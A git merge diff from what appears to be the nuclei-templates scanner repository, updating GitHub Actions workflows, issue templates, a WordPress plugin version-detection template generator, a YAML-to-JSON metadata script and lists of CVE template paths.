Merge branch 'main' into CVE-2017-5645
commit
c9db123f00
|
@ -13,7 +13,7 @@ labels: 'false-negative'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ labels: 'false-positive'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
---
|
||||
name: Template Request
|
||||
about: 'request for new template to be created.'
|
||||
labels: 'new-template'
|
||||
|
||||
---
|
||||
|
||||
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||
|
||||
|
||||
### Template for?
|
||||
|
||||
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
|
||||
|
||||
### Details:
|
||||
|
||||
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->
|
|
@ -0,0 +1,30 @@
|
|||
# Set to true to add reviewers to pull requests
|
||||
addReviewers: true
|
||||
|
||||
# Set to true to add assignees to pull requests
|
||||
addAssignees: true
|
||||
|
||||
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||
reviewers:
|
||||
- pussycat0x
|
||||
- DhiyaneshGeek
|
||||
- ritikchaddha
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
numberOfReviewers: 1
|
||||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
# Uses numberOfReviewers if unset.
|
||||
numberOfAssignees: 1
|
||||
|
||||
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||
# skipKeywords:
|
||||
# - wip
|
|
@ -0,0 +1,19 @@
|
|||
# To get started with Dependabot version updates, you'll need to specify which
|
||||
# package ecosystems to update and where the package manifests are located.
|
||||
# Please see the documentation for all configuration options:
|
||||
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
|
||||
|
||||
version: 2
|
||||
updates:
|
||||
|
||||
# Maintain dependencies for GitHub Actions
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: "weekly"
|
||||
target-branch: "main"
|
||||
commit-message:
|
||||
prefix: "chore"
|
||||
include: "scope"
|
||||
labels:
|
||||
- "Type: Maintenance"
|
|
@ -0,0 +1,10 @@
|
|||
beautifulsoup4==4.11.1
|
||||
bs4==0.0.1
|
||||
certifi==2022.9.24
|
||||
charset-normalizer==2.1.1
|
||||
idna==3.4
|
||||
Markdown==3.4.1
|
||||
requests==2.28.1
|
||||
soupsieve==2.3.2.post1
|
||||
termcolor==2.1.1
|
||||
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
'''
|
||||
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||
compares the detect version with the payload version.
|
||||
|
||||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
||||
from time import sleep
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||
|
||||
ranking = 1
|
||||
|
||||
# Top 200 Wordpress Plugins
|
||||
for page_number in range(1, 11):
|
||||
|
||||
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Connection": "keep-alive",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Cache-Control": "max-age=0",
|
||||
"Pragma": "no-cache",
|
||||
}).content
|
||||
|
||||
# Parse HTML
|
||||
soup = BeautifulSoup(html, 'html.parser')
|
||||
results = soup.find(id="main")
|
||||
articles = results.find_all("article", class_="plugin-card")
|
||||
|
||||
# Setting the top tag
|
||||
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||
|
||||
# Get each plugin in the page
|
||||
for article in articles:
|
||||
|
||||
full_title = article.find("h3", class_="entry-title").get_text()
|
||||
regex_remove_quotes = r"[\"`:]"
|
||||
subst_remove_quotes = "'"
|
||||
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||
|
||||
link = article.find("a").get("href")
|
||||
name = re.search(regex, link).group(1)
|
||||
|
||||
cprint(f"Title: {title}", "cyan")
|
||||
cprint(f"Link: {link}", "yellow")
|
||||
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||
print(f"Page Number: {page_number}")
|
||||
print(f"Top Tag: {top_tag}")
|
||||
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||
ranking += 1
|
||||
|
||||
sleep(0.2)
|
||||
|
||||
# Get the readme.txt file from SVN
|
||||
readme = requests.get(
|
||||
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||
"Cache-Control": "no-cache",
|
||||
"Connection": "keep-alive",
|
||||
"Host": "plugins.svn.wordpress.org",
|
||||
"Pragma": "no-cache",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||
|
||||
# Extract the plugin version
|
||||
try:
|
||||
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||
readme.decode("utf-8")).group(1)
|
||||
except:
|
||||
version = "N/A"
|
||||
|
||||
# Extract the plugin description
|
||||
try:
|
||||
description_markdown = re.search(
|
||||
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||
html = markdown(description_markdown)
|
||||
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||
regex_max_length = r"(\b.{80}\b)"
|
||||
subst_max_lenght = "\\g<1>\\n "
|
||||
description = re.sub(
|
||||
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||
except:
|
||||
description = "N/A"
|
||||
|
||||
print(f"Version: {version}")
|
||||
print(f"Description: {description}")
|
||||
|
||||
# Write the plugin template to file
|
||||
template = f'''id: wordpress-{name}
|
||||
|
||||
info:
|
||||
name: {title} Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://wordpress.org/plugins/{name}/
|
||||
metadata:
|
||||
plugin_namespace: {name}
|
||||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
payloads:
|
||||
last_version: helpers/wordpress/plugins/{name}.txt
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: internal_detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "outdated_version"
|
||||
dsl:
|
||||
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
print("--------------------------------------------")
|
||||
print("\n")
|
|
@ -0,0 +1,93 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Classification struct {
|
||||
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||
}
|
||||
|
||||
type Info struct {
|
||||
Name string `yaml:"name"`
|
||||
Severity string `yaml:"severity"`
|
||||
Description string `yaml:"description"`
|
||||
Classification Classification `yaml:"classification,omitempty"`
|
||||
}
|
||||
|
||||
type Data struct {
|
||||
ID string `yaml:"id"`
|
||||
Info Info `yaml:"info"`
|
||||
FilePath string `json:"file_path"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
if len(os.Args) != 3 {
|
||||
fmt.Println("Usage: go run main.go <directory> <output_file>")
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
directory := os.Args[1]
|
||||
outputFile := os.Args[2]
|
||||
|
||||
var data []Data
|
||||
|
||||
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
yamlFile, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
|
||||
var d Data
|
||||
err = yaml.Unmarshal(yamlFile, &d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
if d.Info.Classification.CVSSScore == "" {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
if d.Info.Classification == (Classification{}) {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
|
||||
d.FilePath = fpath
|
||||
|
||||
data = append(data, d)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading directory: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
var jsonData []byte
|
||||
for _, d := range data {
|
||||
temp, err := json.Marshal(d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
jsonData = append(jsonData, temp...)
|
||||
jsonData = append(jsonData, byte('\n'))
|
||||
}
|
||||
err = ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
fmt.Println("JSON data written to", outputFile)
|
||||
}
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
name: 🗑️ Cache Purge
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
# Wait for 5 minutes
|
||||
- name: Wait for 2 minutes
|
||||
run: sleep 120
|
||||
|
||||
- name: Purge cache
|
||||
uses: jakejarvis/cloudflare-purge-action@master
|
||||
env:
|
||||
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
||||
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
|
||||
# PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'
|
|
@ -3,43 +3,43 @@ name: ✍🏻 CVE Annotate
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**/cves/**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.19
|
||||
|
||||
- name: cve-annotate install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
if ! which cve-annotate > /dev/null; then
|
||||
echo -e "Command cve-annotate not found! Installing\c"
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||
fi
|
||||
cve-annotate -i ./cves/ -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
cve-annotate -i . -d .
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add cves
|
||||
git add .
|
||||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
name: Generate JSON Metadata of CVE Templates
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**/cves/'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
cve2json:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
|
||||
- name: Run yaml2json.go to generate cves.json
|
||||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
|
||||
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add cves.json cves.json-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,39 @@
|
|||
name: 🥳 New Template List
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
templates:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Generate new template list
|
||||
id: new-additions
|
||||
run: |
|
||||
git pull
|
||||
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add .new-additions -f
|
||||
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -22,7 +22,7 @@ jobs:
|
|||
fetch-depth: 0
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.8"
|
||||
|
||||
|
@ -30,17 +30,17 @@ jobs:
|
|||
id: readme-update
|
||||
run: |
|
||||
python .github/scripts/update-readme.py
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -1,6 +1,10 @@
|
|||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
@ -8,7 +12,7 @@ jobs:
|
|||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Yamllint
|
||||
uses: karancode/yamllint-github-action@master
|
||||
uses: karancode/yamllint-github-action@v2.1.1
|
||||
with:
|
||||
yamllint_config_filepath: .yamllint
|
||||
yamllint_strict: false
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
id: checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.checksum.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
|
@ -0,0 +1,32 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
|
@ -1,37 +1,29 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [ push, pull_request ]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
|
||||
- name: Get latest Nuclei release version
|
||||
id: nuclei-latest
|
||||
uses: actions/github-script@v5
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
result-encoding: string
|
||||
script: |
|
||||
const release = await github.rest.repos.getLatestRelease({
|
||||
owner: 'projectdiscovery',
|
||||
repo: 'nuclei',
|
||||
});
|
||||
fetch-depth: 0
|
||||
|
||||
return release.data.name
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.nuclei-latest.outputs.result != ''
|
||||
env:
|
||||
VERSION: ${{ steps.nuclei-latest.outputs.result }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: nuclei install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
cp -r ${{ github.workspace }} $HOME
|
||||
nuclei -validate -t .
|
||||
nuclei -validate -w ./workflows
|
||||
nuclei -duc -validate
|
||||
nuclei -duc -validate -w ./workflows
|
|
@ -10,10 +10,14 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -37,10 +41,10 @@ jobs:
|
|||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
if: steps.stats.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
|
@ -52,4 +56,3 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -0,0 +1,45 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 4 * * *" # every day at 4am UTC
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||
|
||||
- name: Install Python3
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.10"
|
||||
- run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -0,0 +1,25 @@
|
|||
http/cves/2021/CVE-2021-37304.yaml
|
||||
http/cves/2021/CVE-2021-37305.yaml
|
||||
http/cves/2022/CVE-2022-22733.yaml
|
||||
http/cves/2022/CVE-2022-2733.yaml
|
||||
http/cves/2023/CVE-2023-1434.yaml
|
||||
http/cves/2023/CVE-2023-25717.yaml
|
||||
http/cves/2023/CVE-2023-2780.yaml
|
||||
http/cves/2023/CVE-2023-29923.yaml
|
||||
http/exposed-panels/interactsoftware-interact.yaml
|
||||
http/exposed-panels/odoo-panel.yaml
|
||||
http/exposed-panels/repetier-server-panel.yaml
|
||||
http/exposed-panels/shardingsphere-panel.yaml
|
||||
http/exposures/apis/jeecg-boot-swagger.yaml
|
||||
http/exposures/configs/blazor-boot.yaml
|
||||
http/exposures/configs/config-properties.yaml
|
||||
http/misconfiguration/sitecore-lfi.yaml
|
||||
http/misconfiguration/teslamate-unauth-access.yaml
|
||||
http/vulnerabilities/avtech/avtech-auth-bypass.yaml
|
||||
http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml
|
||||
http/vulnerabilities/avtech/avtech-unauth-file-download.yaml
|
||||
http/vulnerabilities/avtech/avtech-verification-bypass.yaml
|
||||
http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml
|
||||
http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
|
||||
network/cves/2016/CVE-2016-3510.yaml
|
||||
network/cves/2020/CVE-2020-11981.yaml
|
|
@ -3,6 +3,11 @@
|
|||
#
|
||||
# This is default list of tags and files to excluded from default nuclei scan.
|
||||
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
||||
#
|
||||
# ============ DO NOT EDIT ============
|
||||
# Automatically updated by nuclei on execution from nuclei-templates
|
||||
# User changes should be in nuclei config file
|
||||
# ============ DO NOT EDIT ============
|
||||
|
||||
# tags is a list of tags to ignore execution for
|
||||
# unless asked for by the user.
|
||||
|
@ -10,7 +15,23 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||
# Please feel free to create PR if you can update the templates with strict matchers.
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
||||
files:
|
||||
- http/cves/2006/CVE-2006-1681.yaml
|
||||
- http/cves/2007/CVE-2007-5728.yaml
|
||||
- http/cves/2014/CVE-2014-9608.yaml
|
||||
- http/cves/2018/CVE-2018-5233.yaml
|
||||
- http/cves/2019/CVE-2019-14696.yaml
|
||||
- http/cves/2020/CVE-2020-11930.yaml
|
||||
- http/cves/2020/CVE-2020-19295.yaml
|
||||
- http/cves/2020/CVE-2020-2036.yaml
|
||||
- http/cves/2020/CVE-2020-28351.yaml
|
||||
- http/cves/2021/CVE-2021-35265.yaml
|
||||
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- http/vulnerabilities/other/nginx-module-vts-xss.yaml
|
|
@ -3,7 +3,9 @@ extends: default
|
|||
|
||||
ignore: |
|
||||
